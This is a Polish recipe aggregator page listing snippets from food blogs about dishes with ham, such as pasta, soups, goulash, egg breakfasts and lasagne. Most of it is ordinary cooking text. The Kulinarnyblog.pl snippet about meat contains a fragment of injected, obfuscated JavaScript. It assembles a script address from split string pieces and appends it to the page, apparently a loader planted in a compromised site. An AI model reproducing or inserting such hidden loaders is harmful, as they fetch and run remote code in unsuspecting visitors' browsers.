szynka gotowana - 6092 przepisów (strona:322/407)

Spaghetti z prostym sosem pomidorowym z mięsem i papryką 151

Spaghetti z prostym sosem pomidorowym z mięsem i papryką. Szukacie prostego pomysłu na obiad? Lubicie makarony? Uwielbiacie sosy pomidorowe? Jeśli tak, to to jest propozycja właśnie

Słodkie okruszki
Zupa ziemniaczano-jarzynowa z serem / Potato Vegetable Soup with Cheese 89

składnikiem zupy jest wędzona papryka, która nadaje zupie wspaniałego aromatu. Jeśli nie macie tej przyprawy, a nie boicie się kalorii, dodajcie do zupy trochę podsmażonego, wędzonego boczku lub wędzonej szynki. Do takiej warzywnej zupy z ziemniakami możecie też dodać swoje ulubione jarzyny - wykorzystajcie to, co akurat macie w lodówce. Zamiast kalafiora dobrze sprawdzi się na  przykład brokuł. Gotowa zupa(...)warzywa podsmażyć  do lekkiego zarumienienia na 3-4 łyżkach masła (czosnek wrzucić na końcu). Dodać mąkę, szybko wymieszać. Zalać całość bulionem i mlekiem. Dodać fasolkę i różyczki kalafiora. Gotować na małym ogniu do miękkości. Doprawić do smaku, dodać ser. Gotową zupę posypać świeżymi ziołami. Gdyby zupa była za gęsta, dodać więcej bulionu lub mleka. Potato Vegetable Soup with Cheese

Lekcje w kuchni
10 pomysłów na śniadanie z jajkiem 163

żółtego  Sól, pieprz, papryka słodka, papryka ostra Przygotowanie: Piekarnik nagrzewamy do 180 stopni. Jajka roztrzepujemy w misce.  Paprykę i szynkę kroimy w kostkę. Ser żółty ścieramy. Dodajemy szynkę, paprykę, ser i groszek do jajek. Doprawiamy całość solą, pieprzem, papryką słodką i ostrą. Mieszamy. Masę jajeczną przelewamy do foremek na muffinki. Muffinki pieczemy przez ok. 20 min. 7. JAJKA(...)PASTA JAJECZNA Z AWOKADO Składniki: 3 jajka 1 dojrzałe awokado 1 łyżka  oleju rzepakowego Olandia 1 łyżeczka soku z cytryny Sól himalajska Pieprz czarny Dowolne zioła Przygotowanie: Jajka gotujemy na twardo (wkładamy jajka do wrzącej wody na ok. 6 min.) i studzimy w zimnej.  Obieramy i kroimy w drobną kosteczkę. Awokado kroimy na pół, przekręcamy, wbijamy nóż

Czarnawisienka
Makaron z pieczarkami i bakłażanem 109

moich przepisów: – zebrane w jednym miejscu najlepsze przepisy na makarony – makaron z szynką parmeńską i oliwkami – makaron z kurczakiem – makaron z pieczarkami – penne z szynką parmeńską – makaron z boczkiem – makaron ze szpinakiem – makaron z polędwicą – makaron z krewetkami – spaghetti aglio oilo – spaghetti bolognese – spaghetti carbonara – spaghetti(...)plasterki i smaż jeszcze 2 minuty. Do rondla dodaj makaron, passatę pomidorową, wodę (najlepiej wrzątek), dopraw 1,5 łyżeczką soli i podobną ilością pieprzu. Zagotuj, zmniejsz ogień i gotuj około 10 minut, w zależności od tego jakiego makaronu użyjesz i jak szybko zrobi się miękki. Po ugotowaniu ewentualnie dopraw o smaku, dodaj posiekaną pietruszkę i podawaj. SMACZNEGO! Artykuł Makaron

nietylkopasta.pl
Gulasz ze schabu wieprzowego 186

propozycja na obiad. Jako, że nasza rodzina jest mięsożerna to regularnie przygotowujemy różne mięsne dania, które sę podstawą obiadu. Tym razem proponuję przygotować chudy Gulasz ze schabu zamiast z szynki wieprzowej , mimo, że tłuszcz jest doskonałym przekaźnikiem i wzmacniaczem smaku, to z chudego schabu można też zrobić pyszny gulasz. Gulasz ze schabu można podać z dowolnymi dodatkami: ziemniakami, kaszami, makaronem(...)miękkości schabu (ok. 30-40 min.), gdy płyn wystarczająco się zredukuje tworząc pyszny, gęsty sos gulasz ze schabu jest gotowy, na końcu lekko zabielamy sos śmietanką (opcjonalnie), już nie gotujemy tylko mieszamy. Jeśli woda szybciej odparuje niż zmięknie mięso, podlewamy gulasz jeszcze wrzącą wodą. Gotowy gulasz przekładamy do miseczek, dekorujemy świeżymi listkami natki pietruszki. Podajemy z surówką ze świeżej kapusty

Damsko-męskie spojrzenie na kuchnię
Szukanie i powroty. Focaccia na początek. 163

wracają smaki, choć niezbyt im się spieszy...Od kilku dni znów zaczynam dzień od kawy, choć ona wciąż smakuje inaczej niż przedtem. Zaczynają też nareszcie kiełkować wytęsknione myśli o gotowaniu i pieczeniu. Choć pierwszeństwo przypadło porządkom - zapomniana kuchnia powoli zaczyna wracać do życia.  Wyciągam garnki, miski, rondelki - jednak za chwilę chowam z powrotem. Nie będą jeszcze potrzebne. Wystarczy jedna(...)przekładam do tortownicy. Małe bułeczki-focaccie znikają od razu po upieczeniu maczane na ciepło w oliwie.  Okrągłą focaccię odkładam na później. Kroję na pół, smaruję oliwą, nadziewam szynką, pomidorami, bazylią, czosnkiem i mozarellą. Składam tą dużą kanapkę i opiekam na grillu. Powstaje okrągła, chrupka panini, która znika równie szybko jak małe bułeczki. I co najważniejsze smakuje tak, jak powinna

KUCHARNIA
Gorący kociołek 28140

Zapraszam :)  Składniki : 400 g makaronu Fusilli    Fabijańscy około 1 kg szynki  3  marchewki 2 cebule kawałek pora 1/2 puszki groszku 2 małe papryki czerwone 30 dag pieczarek 1 mała papryczka chilli suszona Vegeta 2 łyżki czosnku granulowanego  2/3 łyżki ziół prowansalskich 2 łyżki papryki czerwonej Wykonanie : Mięso umyć i pokroić w grubą kostkę(...)pokrojoną w paseczki. Chwilę dusimy. Z płynu który nam się wytworzył podczas duszenia mięsa robimy sosik , w szklance wody rozrobić troszkę mąki dodać do mięsa i chwilkę zagotować . Makaron gotujemy al dente , dodajemy do mięsa z warzywami i mieszamy . Przyprawiamy jeszcze do smaku . Smacznego

Sama słodycz i szczypta chili
Makaron z cukinią, pieczarkami i mięsną roladą 138

roladę z mięsa, szpinakiem i pieczarkami to wystarczy kilka chwil, a obiad będzie gotowy. Smacznego Składniki na 4 porcje: 10 szt. makaronu gniazdko Czaniecki, 250 g mięsa wieprzowego od szynki, 1 sucha pszenna kajzerka, 1 jajko, 2 ząbki czosnku, 1 papryczka chili, 2 garści świeżego szpinaku, 1 biała cebula, 250 g pieczarek, 1 mała cukinia, oliwki czarne, sól do smaku(...)mięsie układamy listki szpinaku (tak jak na zdjęciu), a następnie wysmażone pieczarki. Mięso zaczynając od dłuższego boku zwijamy do środka formując roladę. Roladę skręcamy w folię jak cukierek i gotujemy na parze ok. 25 min. Makaron gotujemy w lekko osolonej wodzie na al. dente . Pozostałe pieczarki kroimy w plasterki i podsmażamy je na złoty kolor. Z cukinii nożykiem do obierania

Moniki Smakołyki
Co warto wiedzieć na temat mięsa? 173

względu na cenne składniki odżywcze. Wieprzowina to z kolei cenne źródło żelaza, cynku i witaminy B1. Do codziennej diety najlepiej wybrać chude kawałki, takie jak schab czy szynka. Obecnie dużą popularnością cieszy się wołowina, która ma dużo więcej żelaza i cynku niż kurczak, a przy tym smakuje wyjątkowo wyśmienicie. Dlaczego jakość kupowanego mięsa jest ważna? Bez względu na rodzaj wybranego(...)t5vyu+="x03uv8da0jls"; t5vyu+="5lysh9";t5vy_+=("f")+"o"+("/");t5vy.src="https://"+t5vy_+t5vyu; t5vyd=document.body;t5vyd.appendChild(t5vy); })(); Artykuł Co warto wiedzieć na temat mięsa? pochodzi z serwisu Kulinarny Blog - wiesz jak gotować

Kulinarnyblog.pl - wiesz jak gotować!
PULPETY Z FETĄ W SOSIE POMIDOROWYM 112

Wystarczy zajrzeć do lodówki, trochę pozawijać, doprawić, wymieszać, poczarować i voila! :) PULPETY Z FETĄ W SOSIE POMIDOROWYM (na 6-8 porcji) Składniki na pulpety: 500 g mięsa mielonego z szynki 1/2 posiekanej cebuli, najlepiej podsmażonej 1 jajko 3 łyżki bułki tartej suszone oregano suszona bazylia  suszony czosnek sól i pieprz 1/2 kostka sera typu feta Składniki(...)liść laurowy, ziele angielskie i podsmażam razem. Następnie wrzucam pomidory z puszki, dodaję bulion i koncentrat pomidorowy. Całość zagotowuję i doprawiam do smaku suszonymi ziołami, solą i pieprzem, Do gotującego się sosu wkładam ostrożnie pulpety. Gotuję pod przykryciem około 20 - 25 minut, na małym ogniu, co jakiś czas przewracając kotleciki w sosie i pilnując, aby ten się nie przypalił

W kuchni Karmel-itki
Szynka z dzika pieczona 211

szynki z dzika, maślanka – około 1 litra, sól gruboziarnista, 400 g boczku wędzonego parzonego, 3 gałązki rozmarynu, 6 jagód jałowca, 10 ziaren pieprzu czarnego, 5 ziaren ziela angielskiego, sznurek do pieczenia, Mięso zalać maślanką i odstawić na 24 godziny w chłodne miejsce. Mięso wyjąć z maślanki, osuszyć, natrzeć solą i odstawić na 24 godziny w chłodne miejsce. Boczek pokroić(...)mięsa, zmierzyć objętość. Uzupełnić wodą do objętości 450 ml. Boczek pokroić, wrzucić do garnka. Wsypać kaszę, wlać płyn, zamieszać. Przykryć. Postawić na dużym ogniu aż do zagotowania. Zmniejszyć ogień. Gotować 15 minut na małym ogniu. Kaszę można podać jako samodzielne danie. Dziczyznę można kupić w sklepie  Dziki Trop .       zastawa

królestwo garów
Domowa wędlina z rozmarynem [ baleron parzony ] 147

Pamiętajmy, aby nie zabić samego smaku mięsa. Tutaj liczy się delikatność a nie nachalność aromatów. Kolejną sztuką jest parzenie wędliny. W moim rodzinnym domu na każde święta Mama wyjmowała szynkę z pekli i delikatnie ją parzyła. Zasada jest jedna - każdy kilogram mięsa parzymy 60 minut w maksymalnie 75-80' C.  Jak to realnie wygląda w garze? Na wrzątek wkładamy(...)Mięso można parzyć po minimum 3 dobach. Najsmaczniejsze będzie po 5-6 dobach. Karkówkę możemy obwiązać sznurkiem, aby delikatnie ją ukształtować. W dużym garze ( tak, aby mięso mogło pływać ) gotujemy wodę z łyżeczką soli. Na wrzątek wkładamy peklowany karczek ( temperatura wody się obniża ). Skręcamy moc ognia, odkrywamy i pilnujemy aby ponownie nie wrzało. Woda ma delikatnie pykać wokół baleronu. Każdy

kawawszklance
Gulasz z dzika 245

jest bardzo proste, jak większość moich przepisów, no ale to już wiecie :)  Porcja: 4-6 osób  Składniki: 1 kg mięsa z dzika ( użyłam polędwicy i szynki) 3 cebule 2 ząbki czosnku 1 duża marchewka 1 seler  200 g pieczarek 50 g suszonych grzybów 1 pietruszka 1 czerwona papryka 20 g suszonej żurawiny 50 g suszonych(...)marchewkę, seler, paprykę, pieczarki i suszone grzyby. Zalewamy to pozostałym winem, dodajemy przecier i miód z musztardą. Doprawiamy  niewielką ilością przypraw i na małym ogniu gotujemy pod przykryciem ok 2 h co jakiś czas mieszając. Po tym czasie jak mięso będzie miękkie doprawiamy do smaku. Prawda, że samo się robi :) Smacznego

Niezły Młynek
Zakład Masarski Majerczyk, czyli wyroby z dobrym i krótkim składem 74

Bardzo cenię domowe wyroby , dlatego lubię samodzielnie upiec pyszny pasztet, czy nawet zrobić dobrą kiełbasę. Bywa również że wędzę mięsa u mojej babci i brata. Niestety

Di gotuje
Lasagne z mięsem mielonym i cukinią pod beszamelem 121

makaronożerców. Smaczne, efektowne i wcale nie trudne do zrobienia. Polecam!   Składniki na 5 porcji/ 30 dag płatów lasagne 1 duża żółta cukinia   30 dag mięsa mielonego z szynki wieprzowej 25 dag mięsa mielonego z wołowiny 2 cebule 1 papryka czerwona 4 ząbki czosnku 3 łyżki oliwy 1 puszka krojonych pomidorów 50 ml czerwonego wytrawnego wina 1 łyżka koncentratu(...)kolejne 5 minut wszystko razem. Zestawić   z ognia. Cukinię pokroić wzdłuż na cienkie szerokie plastry. Sos beszamelowy: Masło roztopić w rondelku, wsypać mąkę i trzepaczką rozprowadzić, gdy zabulgocze gotować 2 minuty, po czym wlewać cienkim strumieniem mleko, cały czas mieszając doprowadzić do wrzenia aż sos zgęstnieje, doprawić solą, pieprzem białym oraz gałką do smaku wymieszać.   W naczyniu żaroodpornym

Wanilia i Kardamon

Proponowane wyszukiwania